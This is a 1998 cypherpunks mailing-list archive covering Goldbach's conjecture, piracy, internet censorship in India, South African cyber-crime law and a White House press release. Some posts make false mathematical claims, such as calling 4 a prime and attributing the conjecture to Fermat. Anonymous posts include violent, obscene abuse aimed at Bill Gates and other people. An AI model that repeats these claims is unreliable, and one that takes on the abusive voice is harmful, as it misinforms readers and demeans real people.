prime area.

It's interesting that Fermat doesn't mention that the only prime that can
use two as a factor is 4. And you can't factor 2 at all since we eliminate
1 as a potential candidate (another issue of symmetry breaking simply so we
don't have to write '....works for every prime but 1' on all our theorems).

> repetition. Therefore, under Goldbach's conjecture:
> 
> 4 -> 2 + 2
> 6 -> 3 + 3 but NOT 2 + 2 + 2
> 8 -> 5 + 3 but NOT 2 + 2 + 2

The real issue for me is the interaction of primes (ie n * 1 = n) and the
identity theorem (ie n * 1 = n). They're opposite sides of the same coin.

It doesn't really matter now since it doesn't look like I'm going to get a
copy of EURISKO in this lifetime to play with.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 20 Nov 1998 06:17:27 +0800
To: cypherpunks@toad.com
Subject: Re: Fwd: Re: Snowball fight '98 - '99
Message-ID: <199811192045.VAA07824@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Guess what time it is?  That's right!  It's time to FUCK OFF!  Why don't
you jam a rusty nail in your snowball, shove it up your ass, spin it
around violently, and get back to me when you're dead.

Thanks.

At 12:42 PM 11/19/98 -0700, ethena@usa.net wrote:
>
>  > GOTCHA!!! 
>  > > \ | / 
>  > > \\ \ | | / // 
>  > > \\\ \\ // /// 
>  > > \\\ ####### /// 
>  > > \\## ##// 
>  > > -- ## ## -- 
>  > > -- ## squish!! ## -- 
>  > > //## ##\\ 
>  > > // ### ### \\ 
>  > > /// ####### \\\ 
>  > > /// // \\ \\\ 
>  > > // / | | \ \\ 
>  > > / | \ 
>  > > 
>  > > You have just been hit with a snow ball! 
>  > > > It's the start of..... 
>  > > Snow Ball Fight '98/'99!!!! 
>  > > 
>  > > One rule to this game.... 
>  > > You can't hit someone who has already hit you! 
>  > > Now...go out there and hit as many people 
>  > > as you can before they get you!! 
>  > 
>
>____________________________________________________________________
>Get free e-mail and a permanent address at http://www.netaddress.com/?N=1




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blake Buzzini" <bab282@psu.edu>
Date: Fri, 20 Nov 1998 11:41:10 +0800
To: "CypherPunks" <cypherpunks@Algebra.COM>
Subject: RE: Goldbach's Conjecture
In-Reply-To: <199811200034.SAA07327@einstein.ssz.com>
Message-ID: <002201be1434$5ce50380$88e3ba92@ruby-river>
MIME-Version: 1.0
Content-Type: text/plain



I could be wrong, but I thought Goldbach's conjecture was that every even
number could be expressed as the sum of *two* primes. This doesn't prohibit
repetition. Therefore, under Goldbach's conjecture:

4 -> 2 + 2
6 -> 3 + 3 but NOT 2 + 2 + 2
8 -> 5 + 3 but NOT 2 + 2 + 2
etc...

But I am a lowly freshman, so what do I know...

Blake Buzzini, PSU


-----Original Message-----
From:	owner-cypherpunks@algebra.com [mailto:owner-cypherpunks@algebra.com]
On Behalf Of Jim Choate
Sent:	Thursday, November 19, 1998 7:34 PM
To:	Cypherpunks Distributed Remailer
Subject:	Goldbach's Conjecture


If we go with the flow and exclude 1 (so we don't have to rewrite all our
theorems) and assume that all even numbers greater than 2 can be represented
as a sum of two prime factors we have a problem...

How does one sum 4?

2 + 2?

We certainly can't use 3 + 1. If we allow repetition *and* the number 2 as a
prime then all even numbers can be written as a string of 2's summed
appropriately.


    ____________________________________________________________________

            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 20 Nov 1998 12:03:52 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Catastrophic Terrorism
Message-ID: <199811200342.WAA23775@smtp3.atl.mindspring.net>
MIME-Version: 1.0
Content-Type: text/plain



Ex-CIA head John Deutch and two NatSecs write in November
Foreign Affairs on "Catastrophic Terrorism: Tackling the New
Danger:"

   http://jya.com/ct-tnd.htm  (36K)

They propose three new orgs to prevent and respond to terrorist
use of WMD on a large scale:

1. National Terrorism Intelligence Center (Mil/Intel/LEA)
2. National Information Assurance Institute (Gov/Corp/Tank)
3. Catastrophic Terrorism Response Offices (Intel/Plan/Train/Task/Direct)

Paralleling Senator Kyl and others, the proposals are based
on the increased domestic use of the military while proclaiming
civil liberties will be protected. And though there is considerable
detail about how the military, intelligence agencies and
law enforcement will work together - US and foreign - and the
vast purchases of sevices and equipment that will be needed, 
there's next to nothing about how civil liberties will be protected.

Reference is made to America's marshalling its patriotism and 
technology to win the Cold War, and the wondrous inventions
developed to do that. Again, though, no mention is made of the
price of military industrialism, which is to be expected of our
finest catastrophe-obessessed minds unable to imagine a world 
without endless national security threats to grow their pork.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Fri, 20 Nov 1998 12:19:23 +0800
To: Anonymous <nobody@replay.com>
Subject: Re: your mail
In-Reply-To: <199811190754.IAA15057@replay.com>
Message-ID: <Pine.BSF.3.91.981119230308.23643D-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




Hey, asshole, keep my name outta this.

On Thu, 19 Nov 1998, Anonymous wrote:

>  #####      #    ######
>  #    #     #    #
>  #    #     #    #####
>  #    #     #    #
>  #    #     #    #
>  #####      #    ######
> 
>                                          #####
>  #    #     #     ####   #####    ####  #  #  #   ####   ######   #####
>  ##  ##     #    #    #  #    #  #    # #  #     #    #  #          #
>  # ## #     #    #       #    #  #    #  #####   #    #  #####      #
>  #    #     #    #       #####   #    #    #  #  #    #  #          #
>  #    #     #    #    #  #   #   #    # #  #  #  #    #  #          #
>  #    #     #     ####   #    #   ####   #####    ####   #          #
> 
>  #####      #    ######
>  #    #     #    #
>  #    #     #    #####
>  #    #     #    #
>  #    #     #    #
>  #####      #    ######
> 
> 
> FUCK micro$oft. Kill them all. Nuke Redmond.
> Sodomize bILL gATES.
> Cut his micro$oft prick and shove it up
> his own ass. 
> Rabid motherfucking whoremongerz at redmond.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Fri, 20 Nov 1998 12:24:49 +0800
To: Richard.Bragg@ssa.co.uk
Subject: Re: manners
In-Reply-To: <802566C1.00536A3E.00@seunt002e.ssa.co.uk>
Message-ID: <Pine.BSF.3.91.981119230712.23643E-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain





On Thu, 19 Nov 1998 Richard.Bragg@ssa.co.uk wrote:

> There are ways and means.  If someone requests software that is NOT free
> then a simple NO will surfice.  A list of contacts to purchase would aid
> income for the producer.
> An additional approach would be to suggest alternatives that are free.
> 
> There is never any call to be rude.
> 

Way to go, Dick!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 20 Nov 1998 13:38:03 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: Goldbach's Conjecture (fwd)
Message-ID: <199811200520.XAA08942@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: "Blake Buzzini" <bab282@psu.edu>
> Subject: RE: Goldbach's Conjecture (fwd)
> Date: Thu, 19 Nov 1998 23:37:09 -0500

> >From _Elementary Theory of Numbers_ by William J. LeVeque, pg. 6:
> 
> "It was conjectured by Charles Goldbach in 1742 that every even integer
> larger than 4 is the sum of two odd primes.  (All primes except 2 are odd,
> of course, since evenness means divisibility by two.)"

Ok, so this one says it was Goldbach himself and in particular states two
odd primes completely eliminating 4 from the get go ...

> >From _Excursions in Number Theory_ by C. Stanley Ogilvy and John T.
> Anderson, pg. 82:
> 
> "Goldbach's conjecture. Is every even number expressible as the sum of two
> primes?"

This one is the second version...

> >From _Goldbach's Conjecture_ by Eric W. Weisstein
> (http://www.astro.virginia.edu/~eww6n/math/GoldbachConjecture.html):
> 
> "Goldbach's original conjecture, written in a 1742 letter to Euler, states
> that every Integer >5 is the Sum of three Primes. As re-expressed by Euler,
> an equivalent of this Conjecture (called the ``strong'' Goldbach conjecture)
> asserts that all Positive Even Integers >= 4 can be expressed as the Sum of
> two Primes."

And finaly a third completely different slant. They at least get Fermats
contribution right.

> Am I misreading somewhere?

Well I'd say that all three of your references tended to contradict each
other. Which one do you want to stand on?

This is my quote:
 
> No, that was Fermat, Goldbach just says every even number greater than two
> can be represented as a sum of primes. Basicaly Fermat says that if we have
> n primes we can reduce them to 2 primes only, in all cases. Which happens to
> exclude using equilateral triangles as a test bed since you can't tile a
> equilateral with only two other equilaterals, you could use rectangles
> though. So basicaly from a geometric perspective Fermat says that given a
> rectangle of even area it is possible to divide it with a bisector into two
> rectangles of prime area.
> 
> It's interesting that Fermat doesn't mention that the only prime that can
> use two as a factor is 4. And you can't factor 2 at all since we eliminate
> 1 as a potential candidate (another issue of symmetry breaking simply so we
> don't have to write '....works for every prime but 1' on all our theorems).

I'll stand by this statement.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blake Buzzini" <bab282@psu.edu>
Date: Fri, 20 Nov 1998 13:06:44 +0800
To: "CypherPunks" <cypherpunks@Algebra.COM>
Subject: RE: Goldbach's Conjecture (fwd)
In-Reply-To: <199811200339.VAA08272@einstein.ssz.com>
Message-ID: <002301be143f$6f8624f0$88e3ba92@ruby-river>
MIME-Version: 1.0
Content-Type: text/plain



>From _Elementary Theory of Numbers_ by William J. LeVeque, pg. 6:

"It was conjectured by Charles Goldbach in 1742 that every even integer
larger than 4 is the sum of two odd primes.  (All primes except 2 are odd,
of course, since evenness means divisibility by two.)"


>From _Excursions in Number Theory_ by C. Stanley Ogilvy and John T.
Anderson, pg. 82:

"Goldbach's conjecture. Is every even number expressible as the sum of two
primes?"


>From _Goldbach's Conjecture_ by Eric W. Weisstein
(http://www.astro.virginia.edu/~eww6n/math/GoldbachConjecture.html):

"Goldbach's original conjecture, written in a 1742 letter to Euler, states
that every Integer >5 is the Sum of three Primes. As re-expressed by Euler,
an equivalent of this Conjecture (called the ``strong'' Goldbach conjecture)
asserts that all Positive Even Integers >= 4 can be expressed as the Sum of
two Primes."


Am I misreading somewhere?

Blake Buzzini, PSU

-----Original Message-----
From:	owner-cypherpunks@Algebra.COM [mailto:owner-cypherpunks@Algebra.COM]
On Behalf Of Jim Choate
Sent:	Thursday, November 19, 1998 10:39 PM
To:	Cypherpunks Distributed Remailer
Subject:	RE: Goldbach's Conjecture (fwd)


Forwarded message:

> From: "Blake Buzzini" <bab282@psu.edu>
> Subject: RE: Goldbach's Conjecture
> Date: Thu, 19 Nov 1998 22:17:54 -0500

> I could be wrong, but I thought Goldbach's conjecture was that every even
> number could be expressed as the sum of *two* primes. This doesn't
prohibit

No, that was Fermat, Goldbach just says every even number greater than two
can be represented as a sum of primes. Basicaly Fermat says that if we have
n primes we can reduce them to 2 primes only, in all cases. Which happens to
exclude using equilateral triangles as a test bed since you can't tile a
equilateral with only two other equilaterals, you could use rectangles
though.
So basicaly from a geometric perspective Fermat says that given a rectangle
of
even area it is possible to divide it with a bisector into two rectangles of
prime area.

It's interesting that Fermat doesn't mention that the only prime that can
use two as a factor is 4. And you can't factor 2 at all since we eliminate
1 as a potential candidate (another issue of symmetry breaking simply so we
don't have to write '....works for every prime but 1' on all our theorems).

> repetition. Therefore, under Goldbach's conjecture:
>
> 4 -> 2 + 2
> 6 -> 3 + 3 but NOT 2 + 2 + 2
> 8 -> 5 + 3 but NOT 2 + 2 + 2

The real issue for me is the interaction of primes (ie n * 1 = n) and the
identity theorem (ie n * 1 = n). They're opposite sides of the same coin.

It doesn't really matter now since it doesn't look like I'm going to get a
copy of EURISKO in this lifetime to play with.


    ____________________________________________________________________

            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "kryz" <chrisharwig@hetnet.nl>
Date: Fri, 20 Nov 1998 08:23:00 +0800
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: Fw: 1998-11-10 VP Unveils a Vietnam Veterans Virtual Wall on the Internet
In-Reply-To: <19981117171159.5.MAIL-SERVER@pub1.pub.whitehouse.gov>
Message-ID: <MAPI.Id.0016.0072797a202020203030303430303034@MAPI.to.RFC822>
MIME-Version: 1.0
Content-Type: text/plain





----------
| Date: dinsdag 17 november 1998 16:12:00
| From: The White House
| To: Public-Distribution@pub.pub.whitehouse.gov
| Subject: 1998-11-10 VP Unveils a Vietnam Veterans Virtual Wall on the Internet
|
|
|                             THE WHITE HOUSE
|
|                      Office of the Vice President
| ________________________________________________________________________
| For Immediate Release                                  November 10, 1998
|
|
|
|              VICE PRESIDENT GORE UNVEILS A VIETNAM VETERANS
|                  "VIRTUAL WALL" ON THE INTERNET AS PART
|                  OF A NEW VETERAN'S EDUCATION INITIATIVE
|
|             Also, Highlights New World War II Veterans Stamps
|
|
|      Washington, DC -- Vice President Gore announced today the creation
| of a Vietnam veterans "virtual wall" as part of a new web site to enable
| users to search for names and hear personal remembrances of Vietnam
| veterans.
|
|      "For 15 years, people have come to the Vietnam Wall to run their
| hands across the names and remember those who never came home," Vice
| President Gore said.  "Now, anybody who can run their hands across a
| computer keyboard will be able to make contact with those names and
| learn even more -- that these names belong to people who were brothers
| and sons, husbands and wives, mothers and daughters and that their
| courage helped make our freedom possible."
|
|      The web site -- a joint project of the Vietnam Veterans Memorial
| Fund and Winstar Communications, Inc. -- will become available in two
| stages:
|
|      Starting Veterans' Day, users will be able to tap into a new
|      web site on which they can click onto a deceased veteran's name
|      and hear audio remembrances from family members or friends.
|
|      Starting January 1999, users will be able to walk up to an
|      on-line virtual wall that recreates the look and feel of the
|      Vietnam Veterans Memorial Wall, run their hands over a
|      veteran's name as it appears on the actual memorial, and hear
|      audio remembrances from family members or friends.
|
|      The virtual wall is part of a nationwide program, The Young
| Americans Vietnam War Era Studies Project, to help educate students at
| over 17,000 American public and private high schools about the Vietnam
| War.
|
|      The project will include Vietnam-era high school curriculum guides
| that, among other things, will include an introduction to the Vietnam
| War; a look at the politics of the war; and information about those who
| served.  An Internet Education Center will focus on the historical,
| social, and political aspects of the war.
|
|      The Vietnam Veterans Memorial Fund also created a traveling replica
| of the Vietnam Veterans Memorial, which is currently located in New
| York, to allow grieving survivors and families to view the memorial in
| their own communities.  On Veterans Day, the traveling exhibit will
| include kiosks to enable Americans to record their remembrances of the
| war for posting on the virtual wall.
|
|      Earlier today, the Vice President unveiled the U.S. Postal
| Services' Celebrate the Century stamp series that includes three new
| World War II-related stamps:
|
|      the "World War II" stamp that pays tribute to the 16 million
|      men and women who served and sacrificed in uniform during that
|      war;
|
|      the "Women Support War Effort" stamp that honors the
|      contributions of home front war workers, without whom
|      soldiers, sailors, pilots, and marines could not have achieved
|      victory; and
|
|      the "GI Bill 1994" stamp that salutes the legislation that
|      provided benefits for veterans.
|
|      The Vice President praised the American Battle Monuments Commission
| and the U.S. Postal Service for coming together to make these
| commemorative stamps available to the American public.
|
|                                     ###
|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Fri, 20 Nov 1998 13:06:25 +0800
To: Steve Schear <schear@lvcm.com>
Subject: Re: Piracy and cypherpunks
In-Reply-To: <v04003a0bb27a95d405ca@[24.1.50.17]>
Message-ID: <Pine.BSF.3.91.981119234213.23643J-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




The best defence for the programmer is to make the software so buggy, 
complex, and poorly documented that enough revenue is obtained through 
support contracts and fees, supplemental documentation, training courses, 
and the like to cover the potential losses to piracy. NT comes to mind. ;)

On Thu, 19 Nov 1998, Steve Schear wrote:

> I tried to take a crack at it in Laissez Faire City Times
> http://www.zolatimes.com/V2.16/pageone.html
> 
> Tim May wrote:
> >At 7:33 AM -0800 11/19/98, Jim Gillogly wrote:
> >-- all issues of intellectual property are also issues of _enforceability_.
> >To the extent anonymous remailers, information markets, regulatory
> >arbitrage, systems like "BlackNet" ("BlackeBay," anyone?), and other crypto
> >anarchy technologies proliferate, enforcement of any particular nation's
> >intellectual property laws will become problematic.
> >
> >
> >-- finally, the U.S. position on patentability and copyrightability of
> >software and words is not the only position one may find morally
> >supportable. We do not, for example, allow "ideas" to be patented or
> >copyrighted (I don't mean "expressions of ideas," as in patents, or
> >"precise words," as in copyrights. Rather, I mean that we do not allow a
> >person to "own" an idea. To imagine the alternative, cf. Galambos.)
> >
> >
> >Long term, I expect current notions about intellectual property will have
> >to change.
> >
> >I'm a big believer in "technological determinism." For example, in my own
> >view (which I have debated with some well known cyberspace lawyers over the
> >years), the widespread deployment of video cassette recorders (VCRs)
> >necessarily changed the intellectual property laws. The Supreme Court, in
> >Disney v. Sony, uttered a bunch of stuff about time-shifting, blah blah,
> >but the real reason, I think, boiled down to this:
> >
> >"VCRs have become widespread. If people tape shows in their own homes, even
> >violating copyrighted material, there is no way law enforcement can stop
> >them short of instituting a police state and doing random spot checks. The
> >horse is out of the barn, the genie is out of the bottle. The law has to
> >change. But rather than admit that copyright is no longer practically
> >enforceable, we have to couch our decision in terms of "time-shifting" and
> >other such fig leaves."
> >
> >So, too, will anonymous remailers, black pipes, information markets,
> >regulatory arbitrage, and suchlike change the nature of intellectual
> >property.
> >
> >What form these changes will take, I don't know.
> >
> >--Tim May
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 20 Nov 1998 14:15:37 +0800
To: users@EINSTEIN.ssz.com (SSZ User Mail List)
Subject: COPA/CDA II blocked until 12/4/98  [/.]
Message-ID: <199811200557.XAA09091@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://www.techweb.com/wire/story/TWB19981119S0021

>    [IMAGE] TechWeb - The Technology News Site [INLINE]
>     Technology News - [INLINE] [INLINE] . [INLINE] Judge Blocks CDA II
>    (11/19/98, 8:34 p.m. ET)
>    By John Gartner, TechWeb
>    
>    A federal judge on Thursday issued a temporary restraining order
>    preventing the Justice Department from enforcing the Child Online
>    Protection Act (COPA), an anti-pornography law Congress passed in
>    October.
>    
>    Judge Lowell Reed's decision will delay enforcement of the law until
>    at least Dec. 4. The injunction came in response to a lawsuit filed by
>    free speech advocates, filed just one day after the legislation was
>    signed by President Clinton.

[text deleted]


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 20 Nov 1998 15:33:00 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: More Goldbach's Conjecture
Message-ID: <199811200702.BAA09369@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Well there are two more definitions, from the same book [1], that are not
equivalent:

pp. 335

For all natural numbers x, if x is even, non-zero, and not 2, then there
exist prime numbers y and z such that x is the sum of y and z.

pp. 673

...every even number, n>6 (it at least takes care of my question about 4),
 is the sum of two odd primes.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------


[1] VNR Concise Encyclopedia of Mathematics




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vortexia" <vortexia@doxx.net>
Date: Fri, 20 Nov 1998 10:34:03 +0800
To: <cypherpunks@cyberpass.net>
Subject: The South African Internet Industry
Message-ID: <003b01be142b$346d9a60$c9e431ce@vort.nis.za>
MIME-Version: 1.0
Content-Type: text/plain



Hi, the following is the situation as it stands with the development of
internet in south africa, and how things are being monopolised by 2 groups,
fighting for power, at the cost of the average internet user.

The 2 current groups fighting at the moment for power are the ISPA (the
internet service providers association) and the telecomms company,
guaranteed a monopoly on all telecomms in this country until 2003.  The
fight to date has gone as far as telkom trying to claim that the internet
falls under their telecomms monopoly law and therefore they get a monopoly
on it in this country.  This was rejected by SATRA (South African Telecomms
Regulations Authority) but the internet was still placed as a telecomms
service, subject to the telecomms acts.

Up until this time, the fights between the ISPA and Telkom have not as yet
had much bearing on the average internet user in this country, however
suddenly the hacking scene in south africa emerged, and 3 months ago some
kiddie hackers decided to fdisk a bunch of servers.  Under our laws nothing
could be done to them, but 3 months later they break into Telkom, they do no
damage, just browse around the system, telkom has them arrested etc.

Under our legal system however, their computers were seized, but no one was
actually allowed to view the contents of the harddrives etc on the machines.
Including the fact that even if they were allowed to look on those
harddrives, the data on those harddrives was encrypted according to the 2
hackers.


So to sum up the situation in this country:

Our backbone infrastructure of our internet (the telephone lines and digital
lines etc) are being monopolised by one company that is state controlled
(Telkom)
The hacking scene is rising into the picture fast, and no one is ready to
deal with it yet in the industry
The laws of this country protect no one from anything on the internet

Suddenly though there is a fight to create new laws in this country.

The law currently says the following

A.) You cannot be prosecuted for damaging or erasing data on a machine that
is not yours, due to the fact that all property that falls under the laws
which refer to damaged property, has to be corporeal, computer data is not
considered as such.

B.) You cannot be prosecuted for breaking and entering if you penetrate a
computer as breaking and entering under the current law has to refer to a
physical structure that you break into.

C.) You cannot be prosecuted for violations of copyright if you pirate
international software, and 99% of software in south africa is imported from
outside, this is due to the copyright act of 1978 stating the following:

A Computer program is defined as "a set of instructions fixed or stored in
any manner and which, when used directly or indirectly in a computer,
directs its operation to bring about a result"  A computer program will be
subject to copyright if it is original and if the author is a South African
citizen or domiciled or resident in the Republic, or if it is first
published or mad in the Republic.  Copyright initially vests in the author
of a work but it may be transferred to third parties.

With the above as our current law, there is a move to change various parts
of what is currently law.  Everything they are changing it to seems to be
based on the computer laws in the UK, and certain things from singapore.
They are also looking to form legislation that may or may not allow for
attempted decryption of logs on a harddrive, and the entry of decrypted logs
into evidence, the restriction of encryption in this country, the allowance
for semi-tangible evidence etc etc etc.

My question is, does anyone know where I can find information regarding the
UK laws as regards cyber crime, how the courts handle electronic logs, how
the courts handle encryption in the UK, and if anyone has any comments on
the above I would love to hear them.

Cheers

Andrew Alston
(System Administrator)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <mail@vipul.net>
Date: Fri, 20 Nov 1998 07:42:31 +0800
To: cypherpunks@einstein.ssz.com
Subject: VSNL Censors Indian Internet Sites.
Message-ID: <19981120042043.A2051@fountainhead.vipul.net>
MIME-Version: 1.0
Content-Type: text/plain



( My 19th nov. post to cypherpunks@cyberpass.net never showed up on 
  the list, so I reposting.  Thanks. ) 


   17 November, 1998
   FOR IMMEDIATE RELEASE
   Contact: Vipul Ved Prakash, 2233328. 
   

   VSNL Censors Indian Internet Sites


   NEW DELHI, INDIA - VSNL, the Indian Internet monopoly, has been
   illegally blocking Internet access to a number of Indian web sites for
   the last several weeks, a Delhi-based Internet presence provider
   revealed today. The block affects only Indian citizens in India -
   users anywhere else in the world are not affected.
   
   One of the sites targeted is Sense/NET, (www.sensenet.net). Sense/NET
   lets users of VSNL's text-based shell account use the graphical
   Netscape browser over their shell accounts, while using only the
   normal shell account facilities that VSNL provides. With Sense/NET,
   the common man can surf the Internet just like with VSNL's premium
   TCP/IP service, but at a fraction of the cost.
   
   General Logic, the startup company behind the Sense/NET service, is
   not taking the blocking of its server lightly. "We did not so much as
   receive any communication from VSNL about this step, which has the
   potential to seriously affect our business," said Dr. Pawan Jaitly, a
   director of the company. "It seems very strange, too, that a security
   breach was attempted on our server over the Internet just days before
   the blockage."
   
   The censored server, at the (currently blocked) IP address of
   208.222.215.97, hosts a number of other web sites including the
   largest Yellow Pages of Indian exporters and importers available on
   the Internet and the corporate web sites of the Apple Publishing
   Technology Center, NewGen Software, and Educational Consultants India
   Limited.
   
   The award-winning web site of Connect magazine, the first Indian print
   publication to launch a web edition, is also located on the General
   Logic server.
   
   Sense/NET users and others affected by the block who called up VSNL's
   help desk to request clarification on this issue and access to the
   sites were told by VSNL staffers that they did not know what the
   problem was, and that they themselves could not access the sites in
   question. No official intimation or even acknowledgement about the
   block has been forthcoming from VSNL.
   
   This is not the first time VSNL has blocked access to selected sites
   on the Internet. On September 19, 1998, online activist Dr. Arun
   Mehta's writ petition was admitted for hearing in the court of Justice
   Anil Dev Singh, Delhi High Court, against VSNL, challenging its
   blockage of certain Internet sites. The sites listed in the petition
   provide information and software for voice transmissions over the
   Internet.
   
   The petition argues that this action "is wholly without basis in law
   and amounts to arbitrary and illegal censorship of the petitioner's
   Fundamental Right to freedom of speech, expression and information as
   well as an illegal denial of his right to freedom to practice his
   chosen profession."
   
   The petition seeks affirmation that the constitutional rights to free
   speech apply equally in cyberspace, and it also opens up the issue of
   VSNL's ban on Internet telephony to judicial scrutiny. The matter will
   come up for hearing on December 9, 1998. The case is being argued by
   Mr. Ashok Aggarwal.
   
   The Exporters and Importers Yellow Pages web site hosted on General
   Logic's recently blocked server is a vital e-commerce resource for
   over sixty-five thousand traders who earn India valuable foreign
   exchange. "This ban will hurt Indian exporters as well. By banning
   access to sites... VSNL is cynically choosing to let the nation suffer
   severe loss if in the process it can safeguard its own monopolistic
   profits," said Dr. Mehta.
   
   "Ironically, VSNL also blocked Educational Consultants, a public
   sector government organization, with its action."
   
   General Logic was able to move all the web sites that were the victims
   of VSNL's action to a non-blocked area within hours. "Most of our
   clients didn't even notice their sites and email messages were being
   blocked by VSNL," said Dr. Jaitly. The Sense/NET site remains blocked,
   however.
   
   "What VSNL is doing is completely illegal. A website is a means of
   expression and is covered by the right to expression of all indian
   citizens under article 19(1)a of the Indian Constitution. This can
   only be restricted under article 19(2) on 'reasonable grounds' which
   include obscenity, but certainly not the provision of competitive
   services at reasonable cost," commented Rishab Aiyer Ghosh, managing
   editor of First Monday, a European journal on Internet law.
   
   Last year a duo of computer whiz-kids in Cochin released Shellsock, a
   software package that made it possible for users of VSNL shell
   accounts to browse the 'Net graphically. VSNL quickly set about
   working on ways to break Shellsock, and eventually succeeded in
   restricting the environment on its shell accounts to the extent that
   Shellsock was unable to function.
   
   General Logic launched its Sense/NET service soon after, with the goal
   of providing TCP/IP Internet 'tunneling' service to users worldwide,
   not just in India. "There are other countries suffering under the yoke
   of state censorship of the Internet, like China, whose authoritatian
   government, without warning, blocked access to the BBC web site for
   its citizens," said Dr. Mehta. "VSNL is a monopoly that is crippling
   India's progress on the Internet front."
   
   Even Microsoft, he observed, which holds an effective monopoly in the
   operating system market worldwide, has no mandate by any government in
   the market - it has to keep forging ahead or lose to its competitors.
   "VSNL does not have that motivation, and so it is that the Indian
   consumer and India suffer."
   
   Besides the threat of censorship and poor service, another risk with
   state monopoly Internet access providers is that they can read your
   mail, and monitor your communications, as the data flows through their
   systems. Jaitly disclosed that his company is working on providing
   strong military grade encryption as part of its Internet tunneling
   services, to provide secure private networks across untrusted links
   for business and personal use.
   
   "We envision Sense/NET as a sort of 'Meta ISP' providing secure,
   uncensorable Internet tunneling service to people in places where
   local access providers are unable or unwilling to deliver full
   access," said Vipul Ved Prakash, Director of research at General
   Logic. "We believe in every individual's fundamental right to access
   human knowledge without restriction. Our message to these people is:
   'There's light at the end of the tunnel.'"
   
   It's not all crypto-anarchy and dreams of digital revolution, however.
   Sense/NET is a valuable service for ordinary users who are attempting
   to make the most effective use of their VSNL shell accounts with the
   limited services provided. Many of the subscribers to the service are
   students and other low income groups, who simply cannot afford VSNL's
   higher priced services.
   
   A case in point is that of Pranav Lal, a New Delhi student. Pranav is
   blind, and VSNL's shell account is next to useless for him. Sense/NET
   on the other hand allows him to use voice-enabled software to surf the
   'net.
   
   "I can't afford the VSNL TCP/IP account, but for me it is vital that I
   am in touch with my peers over the world over the Internet," says
   Pranav. "Sense/NET is great because it lets me handle my email and
   navigate the web really simply."
   
   "We see the global free flow of ideas across national borders, enabled
   by digital data communications and encryption technology, as the most
   liberating development of the 20th century," said Ashish Gulhati head
   of development at General Logic. "Regulation is futile," he added. The
   company expects its services will be most in demand in countries where
   authoritarian regimes are in power.
   
   "It's shocking that this kind of thing continues to go on in India,"
   observed Dr. Mehta. "We're the world's largest democracy, on the brink
   of entering the 21st century as a major player in the global software
